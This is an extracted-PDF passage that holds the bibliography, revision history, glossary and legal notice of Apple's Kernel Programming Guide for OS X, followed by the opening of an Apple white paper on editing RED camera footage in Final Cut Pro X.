(C Language). ANSI/IEEE Std. 1003.1. 1996 Edition. ISO/IEC 9945-1: 1996. IEEE Standards Office. ISBN 1-55937-573-6. Programming with POSIX Threads. David R. Butenhof. Addison Wesley Longman, Inc., 1997. ISBN 0-201-63392-2. Programming Advanced Programming in theUNIX Environment. RichardW. Stevens.Addison-Wesley, 1992. ISBN0-201-56317-7. Debugging with GDB: The GNU Source-Level Debugger Eighth Edition for GDB version 5.0 . Richard Stallman et al. Cygnus Support. http://developer.apple.com/documentation/DeveloperTools/gdb/gdb/gdb_toc.html. Open Source Development with CVS , Karl Franz Fogel. Coriolis Group, 1999. ISBN: 1-57610-490-7. Porting UNIX Software: From Download to Debug . Greg Lehey. O’Reilly, 1995. ISBN 1-56592-126-7. Bibliography Operating Systems 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 179The Standard C Library . P.J. Plauger. Prentice Hall, 1992. ISBN 0-13-131509-9. Websites and Online Resources Apple’s developer website (http://www.apple.com/developer/) is a general repository for developer documentation. Additionally, the following sites provide more domain-specific information. Apple’s Public Source projects and Darwin http://www.opensource.apple.com/ The Berkeley Software Distribution (BSD) http://www.FreeBSD.org http://www.NetBSD.org http://www.OpenBSD.org BSD Networking http://www.kohala.com/start/ Embedded C++ http://www.caravan.net/ec2plus GDB, GNUPro Toolkit 99r1 Documentation http://www.redhat.com/docs/manuals/gnupro/ The Internet Engineering Task Force (IETF) http://www.ietf.org jam http://www.perforce.com/jam/jam.html The PowerPC CPU http://www.freescale.com/webapp/sps/site/homepage.jsp?nodeId=0162468rH3bTdG The Single UNIX Specification Version 2 http://www.opengroup.org/onlinepubs/007908799 Bibliography Websites and Online Resources 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 180The USENIX Association; USENIX Proceedings http://www.usenix.org http://www.usenix.org/publications/library/ Security and Cryptography Applied Cryptography: Protocols, Algorithms, and Source Code in C. Bruce Schneier. John Wiley & Sons, 1994. ISBN 0-471-59756-2. comp.security newsgroup (news:comp.security). comp.security.unix newsgroup (news:comp.security.unix). Computer Security . Dieter Gollmann. John Wiley and Son Ltd, 1999. ISBN 0-471-97844-2. Foundations of Cryptography . Oded Goldreich. Cambridge University Press, 2001. ISBN 0-521-79172-3. Secrets and Lies: Digital Security in a Networked World . Bruce Schneier. John Wiley & Sons, 2000. ISBN 0-471-25311-1. Bibliography Security and Cryptography 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 181This table describes the changes to Kernel Programming Guide . Date Notes 2012-02-16 Updated for OS X v10.7. Added a chapter that discusses the early stages of the boot process. “The Early Boot Process” (page 21) was formerly part of Daemons and Services Programming Guide , and was moved here during a reorganization of that book. 2011-03-08 2006-11-07 Added security information and improved kernel build instructions. 2006-10-03 Made minor corrections. 2006-05-23 Added a note about pmuflags to the debugging section. 2006-04-04 Removed out-of-date information for OS X v10.4. 2006-03-08 Updated some stale content for OS X version 10.4. 2006-01-10 Corrected locking prototypes. Made minor fixesto the file system section. Revised networking, synchronization, and kernel services APIs for OS X v10.4. 2005-11-09 Changed terminology from "fat binary" to "universal binary." Clarified the distinction between memory objects and VM objects. 2005-08-11 2005-07-07 Fixed minor errors in build instructions. 2005-06-04 Updated kernel build instructions for OS X v10.4; other minor fixes. 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 182 Document Revision HistoryDate Notes Added information about generating NMI on newer hardware in OS X v10.4 and later; various other minor changes. 2005-04-29 2005-02-03 Made minor corrections. 2004-12-02 Made section number fix to man page reference in Chapter 14. 2004-11-01 Minor wording changes. Added details comparing current_task to mach_task_self. Added information about using AltiVec and floating point in the kernel. 2004-08-01 2003-09-01 Minor corrections to kernel build information Added information relating to Power Macintosh G5 VM issues and debugging. Clarified wait queue documentation (event_t). 2003-08-01 Minor update release. Added index and tweaked wording throughout. Fixed minor errata in debugging chapter. Added a few missing details in the security chapter and cleaned up the equations presented. Corrected a few very minor OS X v10.2-specific details that weren’t caught during the first revision. 2003-02-01 OS X v10.2 update release. Changed information on KEXT management, various small corrections (mainly wording improvements). 2002-08-01 Full web release to coincide with WWDC. Corrected a few minor errata from the previous release. 2002-06-01 2002-01-01 Initial partial web release. Document Revision History 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 183abstraction (v) The process of separating the interface to some functionality from the underlying implementation in such a way that the implementation can be changed without changing the way that piece of code is used. (n) The API (interface) for some piece of functionality that has been separated in this way. address space The virtual addressranges available to a given task (note: the task may be the kernel). In OS X, processes do not share the same address space. The addressspaces of multiple processes can, however, point to the same physical addressranges. This is referred to as shared memory. anonymous memory Virtual memory backed by the default pager to swap files, rather than by a persistent object. Anonymous memory is zero-initialized and exists only for the life of the task. See also default pager; task. API (application programming interface) The interface (calling convention) by which an application program accesses a service. This service may be provided by the operating system, by libraries, or by other parts of the application. Apple Public Source License Apple’s Open Source license, available at http://www.apple.com/publicsource. Darwin is distributed under this license. See also Open Source. AppleTalk A suite of network protocols that is standard on Macintosh computers. ASCII (American Standard Code for Information Interchange) A 7-bit character set (commonly represented using 8 bits) that defines 128 unique character codes. See also Unicode. BSD (Berkeley Software Distribution Formerly known as the Berkeley version of UNIX, BSD is now simply called the BSD operating system. The BSD portion of the OS X kernel is based on FreeBSD, a version of BSD. bundle A directory thatstores executable code and the software resources related to that code. Applications, plug-ins, and frameworks represent types of bundles. Except for frameworks, bundles are presented by the Finder as if they were a single file. Carbon An application environment in OS X that features a set of programming interfaces derived from earlier versions of the Mac OS. The Carbon APIs have been modified to work properly with OS X. Carbon applications can run in OS X, Mac OS 9, and all versions of Mac OS 8 later than Mac OS 8.1 (with appropriate libraries). Classic An application environment in OS X that lets users run non-Carbon legacy Mac OS software. It supports programs built for both Power PC and 68K processor architectures. clock An object used to abstract time in Mach. 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 184 GlossaryCocoa An advanced object-oriented development platform on OS X. Cocoa is a set of frameworks with programming interfaces in both Java and Objective-C. It is based on the integration of OPENSTEP, Apple technologies, and Java. condition variable Essentially a wait queue with additional locking semantics. When a thread sleeps waiting for some event to occur, it releases a related lock so that another thread can cause that event to occur. When the second thread posts the event, the first thread wakes up, and, depending on the condition variable semantics used, either takes the lock immediately or begins waiting for the lock to become available. console (1) A text-based login environment that also displays system log messages, kernel panics, and other information. (2) A special window in OS X that displays messages that would be printed to the text console if the GUI were not in use. This window also displays output written to the standard error and standard output streams by applications launched from the Finder. (3) An application by the same name that displays the console window. control port In Mach, access to the control port allows an object to be manipulated. Also called the privileged port. See also port; name port. cooperative multitasking A multitasking environment in which a running programcan receive processing time only if other programs allow it; each application must give up control of the processor cooperatively in order to allow others to run. Mac OS 9 is a cooperative multitasking environment. See also preemptive multitasking. copy-on-write A delayed copy optimization used in Mach. The object to be copied is marked temporarily read-only. When a thread attempts to write to any page in that object, a trap occurs, and the kernel copies only the page or pages that are actually being modified. See also thread. daemon A long-lived process, usually without a visible user interface, that performs a system-related service. Daemons are usually spawned automatically by the system and may either live forever or be regenerated at intervals. They may also be spawned by other daemons. Darwin The core of OS X, Darwin is an Open Source project that includes the Darwin kernel, the BSD commands and C libraries, and several additional features.The Darwin kernel is synonymous with the OS X kernel. default pager In Mach, one of the built-in pagers. The default pager handles nonpersistent (anonymous)memory. See also anonymousmemory; vnode pager; pager. demand paging An operating-system facility that brings pages of data from disk into physical memory only as they are needed. DLIL (Data Link Interface Layer) The part of the OS X kernel’s networking infrastructure that provides the interface between protocol handling and network device driversin the I/O Kit. A generalization of the BSD “ifnet” architecture. DMA (direct memory access) A means of transferring data between host memory and a peripheral device without requiring the host processor to move the data itself. This reduces processor overhead for I/O operations and may reduce contention on the processor bus. Glossary 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 185driver Software that deals with getting data to and from a device, as well as control of that device. In the I/O Kit, an object that manages a piece of hardware (a device), implementing the appropriate I/O Kit abstractions for that device. See also object. DVD (Digital Versatile Disc) Originally, Digital Video Disc. An opticalstorage medium that provides greater capacity and bandwidth than CD-ROM; DVDs are frequently used for multimedia as well as data storage. dyld (dynamic link editor) A utility that allows programs to dynamically load (and link to) needed functions. EMMI (External Memory Management Interface) Mach’sinterface to memory objectsthat allowstheir contents to be contributed by user-mode tasks. See also external pager. Ethernet A family of high-speed local area network technologies in common use. Some common variants include 802.3 and 802.11 (Airport). exception An interruption to the normal flow of program control, caused by the program itself or by executing an illegal instruction. exception port A Mach port on which a task or thread receives messages when exceptions occur. external pager A module that manages the relationship between virtual memory and a backing store. External pagers are clients of Mach’s EMMI. The pager API is currently not exported to userspace. The built-in pagersin OS X are the default pager, the device pager, and the vnode pager. See also EMMI (External Memory Management Interface). family In the I/O Kit, a family defines a collection of software abstractions that are common to all devices of a particular category (for example, PCI, storage, USB). Families provide functionality and services to drivers. See also driver. FAT (file allocation table) A data structure used in the MS-DOS file system. Also synonymous with the file system that uses it. The FAT file system is also used as part of Microsoft Windows and has been adopted for use inside devices such as digital cameras. fat files See universal binaries. FIFO (first-in first-out) A data processing scheme in which data is read in the order in which it was written, processes are run in the order in which they were scheduled, and so forth. file descriptor A per-process unique, nonnegative integer used to identify an open file (or socket). firewall Software (or a computer running such software) that prevents unauthorized access to a network by users outside of the network. fixed-priority policy In Mach, a scheduling policy in which threads execute for a certain quantum of time, and then are put at the end of the queue of threads of equal priority. fork (1) A stream of data that can be opened and accessed individually under a common filename. The Macintosh Standard and Extended file systems store a separate “data” fork and a “resource” fork as part of every file; data in each fork can be accessed and manipulated independently of the other. (2) In BSD, fork is a system call that creates a new process. framework A bundle containing a dynamic shared library and associated resources, including image files, header files, and documentation. Frameworks Glossary 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 186are often used to provide an abstraction for manipulating device driver families from applications. FreeBSD A variant of the BSD operating system. See http://www.freebsd.org for details. gdb (GNU debugger) gdb is a powerful, source-level debugger with a command-line interface. gdb is a popular Open Source debugger and is included with the OS X developer tools. HFS (hierarchical file system) The Mac OS Standard file system format, used to represent a collection of files as a hierarchy of directories (folders), each of which may contain either files or foldersthemselves. HFS+ The Mac OS Extended file system format. This file system format was introduced as part of Mac OS 8.1, adding support for filenames longer than 31 characters, Unicode representation of file and directory names, and efficient operation on larger disks. host (1) The computer that is running (is host to) a particular program or service. The term is usually used to refer to a computer on a network. (2) In debugging, the computer that is running the debugger itself. In this context, the target is the machine running the application, kernel, or driver being debugged. host processor The microprocessor on which an application program resides. When an application is running, the host processor may call other, peripheral microprocessors, such as a digital signal processor, to perform specialized operations. IDE (integrated development environment) An application or set of tools that allows a programmer to write, compile, edit, and in some cases test and debug within an integrated, interactive environment. inheritance attribute In Mach, a value indicating the degree to which a parent process and its child process share pages in the parent process’s address space. A memory page can be inherited as copy-on-write, shared, or not at all. in-line data Data that’s included directly in a Mach message, rather than referred to by a pointer. See also out-of-line data. info plist See information property list. information property list A special form of property list with predefined keysforspecifying basic bundle attributes and information of interest, such as supported document types and offered services. See also bundle; property list. interrupt service thread A thread running in kernel space for handling I/O that is triggered by an interrupt, but does not run in an interrupt context. Also called an I/O service thread. I/O (input/output) The exchange of data between two parts of a computer system, usually between system memory and a peripheral device. I/O Kit Apple’s object-oriented I/O development model. The I/O Kit provides a framework for simplified driver development, supporting many families of devices. See also family. I/O service thread See interrupt service thread. IPC (interprocess communication) The transfer of information between processes or between the kernel and a process. IPL (interrupt priority level) A means of basic synchronization on uniprocessor systems in traditional BSD systems, set using the spl macro. Interrupts with lower priority than the current IPL will not be acted upon until the IPL is lowered. In many parts of the kernel, changing the IPL in OS X Glossary 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 187is not useful as a means ofsynchronization. New use of spl macros is discouraged. See also spl (set priority level). KDP The kernelshim used for communication with a remote debugger (gdb). Kerberos An authentication system based on symmetric key cryptography. Used in MIT Project Athena and adopted by the Open Software Foundation (OSF). kernel The complete OS X core operating-system environment that includes Mach, BSD, the I/O Kit, file systems, and networking components. kernel crash An unrecoverable system failure in the kernel caused by an illegal instruction, memory access exception, or other failure rather than explicitly triggered as in a panic. See also panic. kernel extension See KEXT (kernel extension). kernel mode See supervisor mode. kernel panic See panic. kernel port A Mach port whose receive right is held by the kernel. See also task port; thread port. KEXT (kernel extension) A bundle that extendsthe functionality of the kernel. The I/O Kit, File system, and Networking components are designed to allow and expect the creation and use of KEXTs. KEXT binary A file (or files) in Mach-O format, containing the actual binary code of a KEXT. A KEXT binary is the minimum unit of code that can be loaded into the kernel. Also called a kernel module or KMOD. See also KEXT (kernel extension); Mach-O. key signing In public key cryptography, to (electronically)state your trust that a public key really belongs to the person who claims to own it, and potentially that the person who claims to own it really is who he or she claims to be. KMOD (kernel module) See KEXT binary. lock A basic means of synchronizing multiple threads. Generally only one thread can “hold” a lock at any given time. While a thread is holding the lock, any other thread that tries to take it will wait, either by blocking or by spinning, depending on the nature of the lock. Some lock variants such as read-write locks allow multiple threads to hold a single lock under certain conditions. Mach The lowest level of the OS X kernel. Mach provides such basic services and abstractions as threads, tasks, ports, IPC, scheduling, physical and virtual address space management, VM, and timers. Mach-O Mach object file format. The preferred object file format for OS X. Mach server A task that providesservicesto clients, using a MIG-generated RPC interface. See also MIG (Mach interface generator). main thread By default, a process has one thread, the main thread. If a process has multiple threads, the main thread is the first thread in the process. A user process can use the POSIX thread API to create other user threads. makefile A makefile detailsthe files, dependencies, and rules by which an executable application is built. memory-mapped files A facility that maps virtual memory onto a physical file. Thereafter, any access to that part of virtual memory causes the corresponding page of the physical file to be accessed. The contents of the file can be changed by changing the contents in memory. Glossary 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 188memory object An object managed by a pager that represents the memory, file, or other storage that backs a VM object. See also pager. memory protection A system of memory management in which programs are prevented from being able to modify or corrupt the memory partition of another program, usually through the use of separate address spaces. message A unit of data sent by one task or thread that is guaranteed to be delivered atomically to another task or thread. In Mach, a message consists of a header and a variable-length body. Some system services are invoked by passing a message from a thread to the Mach port representing the task that provides the desired service. microkernel A kernel implementing a minimal set of abstractions. Typically, higher-level OS services such as file systems and device drivers are implemented in layers above a microkernel, possibly in trusted user-mode servers. OS X is a hybrid between microkernel and monolithic kernel architectures. See also monolithic kernel. MIG (Mach interface generator) (1) A family of software that generates and supports the use of a procedure call interface to Mach’s system of interprocess communication. (2) The interface description language supported by MIG. monolithic kernel A kernel architecture in which all pieces of the kernel are closely intertwined. A monolithic kernel providessubstantial performance improvements. It is difficult to evolve the individual components independently, however. The OS X kernel is a hybrid of the monolithic and microkernel models. See also microkernel. multicast A process in which a single packet can be addressed to multiple recipients. Multicast is used, for example, in streaming video, in which many megabytes of data are sent over the network. multihoming The ability to have multiple network addresses in one computer, usually on different networks. For example, multihoming might be used to create a system in which one address is used to talk to hosts outside a firewall and the other to talk to hosts inside; the computer provides facilities for passing information between the two. multitasking The concurrent execution of multiple programs. OS X uses preemptive multitasking. Mac OS 9 uses cooperative multitasking. mutex See mutex lock (mutual exclusion lock). mutex lock (mutual exclusion lock) A type of lock characterized by putting waiting threads to sleep until the lock is available. named (memory) entry A handle (a port) to a mappable object backed by a memory manager. The object can be a region or a memory object. name port In Mach, accessto the name port allows non-privileged operations against an object (for example, obtaining information about the object). In effect, it provides a name for the object without providing any significant access to the object. See also port; control port. named region In Mach, a form of named memory entry that provides a form of memory sharing. namespace An agreed-upon context in which names (identifiers) can be defined. Within a given namespace, all names must be unique. Glossary 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 189NAT (network address translation) A scheme that transforms network packets at a gateway so network addresses that are valid on one side of the gateway are translated into addresses that are valid on the other side. network A group of hosts that can communicate with each other. NFS (network file system) A commonly used file server protocol often found in UNIX and UNIX-based environments. NKE (network kernel extension) A type of KEXT that provides a way to extend and modify the networking infrastructure of OS X dynamically without recompiling or relinking the kernel. NMI (nonmaskable interrupt) An interrupt produced by a particular keyboard sequence or button that cannot be blocked in software. It can be used to interrupt a hung system, for example to drop into a debugger. nonsimple message In Mach, a message that contains either a reference to a port or a pointer to data. See also simple message. notify port A special Mach port that is part of a task. A task’s notify port receives messages from the kernel advising the task of changes in port access rights and of the status of messages it has sent. nub An I/O Kit object that represents a point of connection for a device or logical service. Each nub provides accessto the device orservice it represents, and provides such services as matching, arbitration, and power management. It is most common that a driver publishes one nub for each individual device or service it controls; it is possible for a driver that vends only a single device orservice to act asits own nub. NVRAM (nonvolatile RAM) RAM storage that retains its state even when the power is off. See also RAM (random-access memory). object (1) A collection of data. (2) In Mach, a collection of data, with permissions and ownership. (3) In object-oriented programming, an instance of a class. OHCI (Open Host Controller Interface) The register-level standards that are used by most USB and Firewire controller chips. Open Source Software that includesfreely available access to source code, redistribution, modification, and derived works. The full definition is available at http://www.opensource.org. Open Transport A communications architecture for implementing network protocols and other communication features on computers running classic Mac OS. Open Transport provides a set of programming interfacesthatsupports, among other things, both the AppleTalk and TCP/IP protocols. out-of-line data Data that’s passed by reference in a Mach message, rather than being included in the message. See also in-line data. packet An individual piece of information sent on a network. page (n) (1) The largest block of virtual address space for which the underlying physical address space is guaranteed contiguous—in other words, the unit of mapping between virtual and physical addresses. (2) logical page size: The minimum unit of information that an anonymous pager transfers between system memory and the backing store. (3) physical page size: The unit of information treated as a unit by a hardware MMU. The logical page size must be at least as large as the physical page size Glossary 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 190for hardware-based memory protection to be possible. (v) To move data between memory and a backing store. pager A module responsible for providing the data for the pages of a memory object. See also default pager; vnode pager. panic An unrecoverable system failure explicitly triggered by the kernel with a call to panic. See also kernel crash. PEF (Preferred Executable Format) The format of executable files used for applications and shared libraries in Mac OS 9; supported in OS X. The preferred format for OS X is Mach-O. physical address An address to which a hardware device,such as a memory chip, can directly respond. Programs, including the Mach kernel, use virtual addresses that are translated to physical addresses by mapping hardware controlled by the Mach kernel. pmap Part of Mach VM that provides an abstract way to set and fetch virtual to physical mappings from hardware. The pmap system is the machine-dependent layer of the VM system. port In Mach, a secure unidirectional channel for communication between tasks running on a single system. In IP transport protocols, an integer identifier used to select a receiving service for an incoming packet, or to specify the sender of an outgoing packet. port name In Mach, an integer index into a port namespace; a port right is specified with respect to its port name. See also port rights. portrights In Mach, the ability to send to or receive from a Mach port. Also known as port access rights. port set In Mach, a set of zero or more Mach ports. A thread can receive messages sent to any of the ports contained in a port set by specifying the port set as a parameter to msg_receive(). POSIX (Portable Operating System Interface) A standard that defines a set of operating-system services. It is supported by ISO/IEC, IEEE, and The Open Group. preemption The act of interrupting a currently running program in order to give time to another task. preemptive multitasking A type of multitasking in which the operating system can interrupt a currently running task in order to run another task, as needed. See also cooperative multitasking. priority In scheduling, a number that indicates how likely a thread is to run. The higher the thread’s priority, the more likely the thread isto run. See also scheduling policy. process A BSD abstraction for a running program. A process’s resources include an address space, threads, and file descriptors. In OS X, a process is based on one Mach task and one or more Mach threads. process identifier (PID), A number that uniquely identifies a process. Also called a process ID. programmed I/O I/O in which the CPU accomplishes data transfer with explicit load and store instructions to device registers, rather than DMA, and without the use of interrupts. This data transfer is often done in a byte-by-byte, or word-by-word fashion. Also known as direct or polled I/O. See also DMA (direct memory access). property list A textual way to represent data. Elements of the property list represent data of certain types,such as arrays, dictionaries, and strings. Glossary 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 191System routines allow programs to read property lists into memory and convert the textual data representation into “real” data. See also information property list. protected memory See memory protection. protocol handler A network module that extracts data from input packets (giving the data to interested programs) and inserts data into output packets(giving the output packet to the appropriate network device driver). pthreads The POSIX threads implementation. See also POSIX (Portable Operating System Interface); thread. quantum The fixed amount of time a thread or process can run before being preempted. RAM (random-access memory) Memory that a microprocessor can either read from or write to. real-time performance Performance characterized by guaranteed worst-case response times. Real-time support is important for applications such as multimedia. receive rights In Mach, the ability to receive messages on a Mach port. Only one task at a time can have receive rights for any one port. See also send rights. remote procedure call See RPC (remote procedure call). reply port A Mach port associated with a thread that is used in remote procedure calls. ROM (read-only memory) Memory that cannot be written to. root (1) An administrative account with special privileges. For example, only the root account can load kernel extensions.(2) In graph theory, the base of a tree. (3) root directory: The base of a file system tree. (4) root file system: The primary file system off which a computer boots, so named because it includes the root node of the file system tree. routine In Mach, a remote procedure call that returns a value. This can be used for synchronous or asynchronous operations. See also simpleroutine. RPC (remote procedure call) An interface to IPC that appears (to the caller) as an ordinary function call. In Mach, RPCs are implemented using MIG-generated interface libraries and Mach messages. scheduling The determination of when each process or task runs, including assignment of start times. scheduling policy In Mach, how the thread’s priority isset and under what circumstancesthe thread runs. See also priority. SCSI (Small Computer Systems Interface) A standard communications protocol used for connecting devicessuch as disk drivesto computers. Also, a family of physical bus designs and connectors commonly used to carry SCSI communication. semaphore Similar to a lock, except that a finite number of threads can be holding a semaphore at the same time. See also lock. send rights In Mach, the ability to send messages to a Mach port. Many tasks can have send rights for the same port. See also receive rights. session key In cryptography, a temporary key that is only used for one message, one connection session, orsimilar. Session keys are generally treated asshared secrets, and are frequently exchanged over a channel encrypted using public key cryptography. Glossary 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 192shadow object In Mach VM, a memory object that holds modified pages that originally belonged to another memory object. Thisis used when an object that was duplicated in a copy-on-write fashion is modified. If a page is not found in this shadow object, the original object is referenced. simple message In Mach, a message that contains neither references to ports nor pointers to data. See also nonsimple message. simpleroutine In Mach, a remote procedure call that does not return a value, and has no out or inout parameters. This can be used for asynchronous operations. See also routine. SMP (symmetric multiprocessing) A system architecture in which two or more processors are managed by one kernel, share the same memory, have equal access to I/O devices, and in which any task, including kernel tasks, can run on any processor. spinlock Any of a family of lock types characterized by continuously polling to see if a lock is available, rather than putting the waiting thread to sleep. spin/sleep lock Any of a family of lock types characterized by some combination of the behaviors of spinlocks and mutex (sleep) locks. spl (set priority level) A macro thatsetsthe current IPL. Interrupts with lower priority than the current IPL will not be acted upon until the IPL is lowered. The spl macros have no effect in many parts of OS X, so their use is discouraged as a means of synchronization in new programming except when modifying code that already uses spl macros. See also IPL (interrupt priority level). socket (1) In a user process, a file descriptor that has been allocated using socket(2). (2) In the kernel, the data structure allocated when the kernel’s implementation of the socket(2) call is made. (3) In AppleTalk protocols, a socket serves the same purpose as a port in IP transport protocols. submap A collection of mappingsin the VM system that is shared among multiple Mach tasks. supervisor mode Also known as kernel mode, the processor mode in which certain privileged instructions can be executed, including those related to page table management, cache management, clock setting, and so on. symmetric multiprocessing See SMP (symmetric multiprocessing). task A Mach abstraction, consisting of a virtual address space and a port namespace. A task itself performs no computation; rather, it isthe framework in which threads run. See also thread. task port A kernel port that represents a task and is used to manipulate that task. See also kernel port; thread port. TCP/IP (Transmission Control Protocol/Internet Protocol) An industry standard protocol used to deliver messages between computers over the network. TCP/IP is the primary networking protocol used in OS X. thread The unit of program execution. A thread consists of a program counter, a set of registers, and a stack pointer. See also task. thread port A kernel port that represents a thread and is used to manipulate that thread. See also kernel port; task port. thread-safe code Code that can be executed safely by multiple threads simultaneously. Glossary 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 193time-sharing policy In Mach, a scheduling policy in which a thread’s priority is raised and lowered to balance its resource consumption against other timesharing threads. UDF (Universal Disk Format) The file system format used in DVD disks. UFS (UNIX file system) An industry standard file system format used in UNIX and similar operating systems such as BSD. UFS in OS X is a derivative of 4.4BSD UFS. Unicode A 16-bit character set that defines unique character codes for characters in a wide range of languages. Unlike ASCII, which defines 128 distinct characters typically represented in 8 bits, there are as many as 65,536 distinct Unicode characters that represent the unique characters used in most foreign languages. universal binaries Executable files containing object code for more than one machine architecture. UPL (universal page list) A data structure used when communicating with the virtual memory system. UPLs can be used to change the behavior of pages with respect to caching, permissions, mapping, and so on. USB (Universal Serial Bus) A multiplatform bus standard that can support up to 127 peripheral devices, including printers, digital cameras, keyboards and mice, and storage devices. UTF-8 (Unicode Transformation Format 8) A format used to represent a sequence of 16-bit Unicode characters with an equivalent sequence of 8-bit characters, none of which are zero. This sequence of characters can be represented using an ordinary C language string. VFS (virtual file system) A set of standard internal file-system interfaces and utilities that facilitate support for additional file systems. VFS provides an infrastructure for file systems built into the kernel. virtual address An address as viewed from the perspective of an application. Each task has its own range of virtual addresses, beginning at address zero. The Mach VM system makes the CPU hardware map these addresses onto physical memory. See also physical address. virtual memory A system in which addresses as seen by software are not the same as addressesseen by the hardware. This provides support for memory protection, reduces the need for code relocatability, and allows the operating system to provide the illusion to each application that it has resources much larger than those that could actually be backed by RAM. VM See virtual memory. vnode An in-memory data structure containing information about a file. vnode pager In Mach, one of the built-in pagers. The vnode pager maps files into memory objects. See also default pager; pager. work loop The main loop of an application or KEXT that waits repeatedly for incoming events and dispatches them. XML (Extensible Markup Language) A dialect of SGML (Standard Generalized Markup Language), XML provides a metalanguage containing rules for constructing specialized markup languages. XML users can create their own tags, making XML very flexible. Glossary 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 194Apple Inc. © 2002, 2012 Apple Inc. All rights reserved. No part of this publication may be reproduced, stored in a retrievalsystem, or transmitted, in any form or by any means, mechanical, electronic, photocopying, recording, or otherwise, without prior written permission of Apple Inc., with the following exceptions: Any person is hereby authorized to store documentation on a single computer for personal use only and to print copies of documentation for personal use provided that the documentation contains Apple’s copyright notice. No licenses, express or implied, are granted with respect to any of the technology described in this document. Apple retains all intellectual property rights associated with the technology described in this document. This document is intended to assist application developers to develop applications only for Apple-labeled computers. Apple Inc. 1 Infinite Loop Cupertino, CA 95014 408-996-1010 Apple, the Apple logo, AppleTalk, Carbon, Cocoa, Finder, FireWire, Keychain, Logic, Mac, Mac OS, Macintosh, Objective-C, OS X, Pages, Panther, Power Mac,Quartz,QuickTime, Spaces, and Xcode are trademarks of Apple Inc., registered in the U.S. and other countries. .Mac is a service mark of Apple Inc., registered in the U.S. and other countries. NeXT and OPENSTEP are trademarks of NeXT Software, Inc., registered in the U.S. and other countries. DEC is a trademark of Digital Equipment Corporation. Intel and Intel Core are registered trademarks of Intel Corporation or its subsidiaries in the United States and other countries. Java is a registered trademark of Oracle and/or its affiliates. OpenGL is a registered trademark of Silicon Graphics, Inc. PowerPC and the PowerPC logo are trademarks of International Business Machines Corporation, used under license therefrom. SPEC is a registered trademark of the Standard Performance Evaluation Corporation (SPEC). UNIX is a registered trademark of The Open Group. Even though Apple has reviewed this document, APPLE MAKES NO WARRANTY OR REPRESENTATION, EITHER EXPRESS OR IMPLIED, WITH RESPECT TO THIS DOCUMENT, ITS QUALITY, ACCURACY, MERCHANTABILITY, OR FITNESS FOR A PARTICULAR PURPOSE.ASARESULT, THISDOCUMENT IS PROVIDED “AS IS,” AND YOU, THE READER, ARE ASSUMING THE ENTIRE RISK AS TO ITS QUALITY AND ACCURACY. IN NO EVENT WILL APPLE BE LIABLE FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL,OR CONSEQUENTIAL DAMAGES RESULTING FROM ANY DEFECT OR INACCURACY IN THIS DOCUMENT, even if advised of the possibility of such damages. THE WARRANTY AND REMEDIES SET FORTH ABOVE ARE EXCLUSIVE AND IN LIEU OF ALL OTHERS, ORAL OR WRITTEN, EXPRESS OR IMPLIED. No Apple dealer, agent, or employee is authorized to make any modification, extension, or addition to this warranty. Some states do not allow the exclusion or limitation of implied warranties or liability for incidental or consequential damages, so the above limitation or exclusion may not apply to you. This warranty gives you specific legal rights, and you may also have other rights which vary from state to state. RED Workflows with Final Cut Pro X White Paper June 2012White Paper 2 RED Workflows with Final Cut Pro X With the continuing popularity of the RED® family of cameras (www.red.com), Final Cut Pro X editors have been looking for proven workflows with REDCODE® RAW files. This white paper outlines how professional production companies are achieving excellent results when recording with RED cameras, editing in Final Cut Pro X, and finishing in applications such as DaVinci Resolve. This document outlines a complete RED-based post-production workflow, following the steps below: 1. Transcode REDCODE RAW files to Apple ProRes using REDCINE-X® PRO. 2. Batch sync audio and video files. 3. Import synced files into Final Cut Pro X. During import, Final Cut Pro X can automatically create lightweight Apple ProRes 422 (Proxy) files for editing. Or, if you have a lot of footage and multiple editors, you can use Compressor to create the Apple ProRes 422 (Proxy) files. 4. Edit and lock picture with Final Cut Pro X. 5. Export an XML file of the project from Final Cut Pro X. 6. Color grade the project in DaVinci Resolve using either high-quality Apple ProRes or R3D RAW files. You can relink the project XML file to the original R3D files in either REDCINE-X PRO or DaVinci Resolve. 7. Export an XML file from DaVinci Resolve and import it back into Final Cut Pro X. 8. Export a final master from Final Cut Pro X. This method combines the best of both worlds—the speed of editing with Apple ProRes on a wide variety of notebook and desktop systems, and the color grading advantages of RAW when finishing. You can further simplify this workflow by transcoding to high-quality Apple ProRes files and using those throughout color grading and delivery. The sections below include additional detail about each stage of the workflow. Transcode REDCODE RAW Files to Apple ProRes RED cameras record a RAW file (R3D) that must be “debayered” and decompressed to convert the original sensor data to viewable pixels, so that the file can play back in video editing software. Apple ProRes is an excellent choice for this conversion, because it’s a codec optimized for both quality and editing speed. Apple ProRes is a full frame size, intra-frame codec designed to efficiently use multiple processors for playback and rendering. The free RED application REDCINE-X PRO supports Apple ProRes encoding, which can be accelerated using the RED ROCKET® card. REDCINE-X PRO also allows you to apply a “one-light” color correction during the transcoding process, giving your footage a more finished look for editing and review.White Paper 3 RED Workflows with Final Cut Pro X In the Field As workflows expand to include field review and even rough cut editing, digital imaging technicians (DITs) are actively transcoding R3D footage to Apple ProRes using high-end portable systems. A typical field-based workflow includes these steps: • Copy the footage from the camera’s recording medium, like the REDMAG™ removable solid-state drive (SSD). • Create backups so that camera originals can be stored in two different places for data protection. • Create Apple ProRes dailies by transcoding the R3D files to Apple ProRes files for editing and H.264 files for uploading to a secure website for client review. Alternatively, after making backup copies, you can deliver the R3D files to the post facility for transcoding to Apple ProRes dailies. Choose Transcoding Settings When you transcode your files to Apple ProRes, choose the level of quality that’s appropriate to your specific production. Workflow Apple 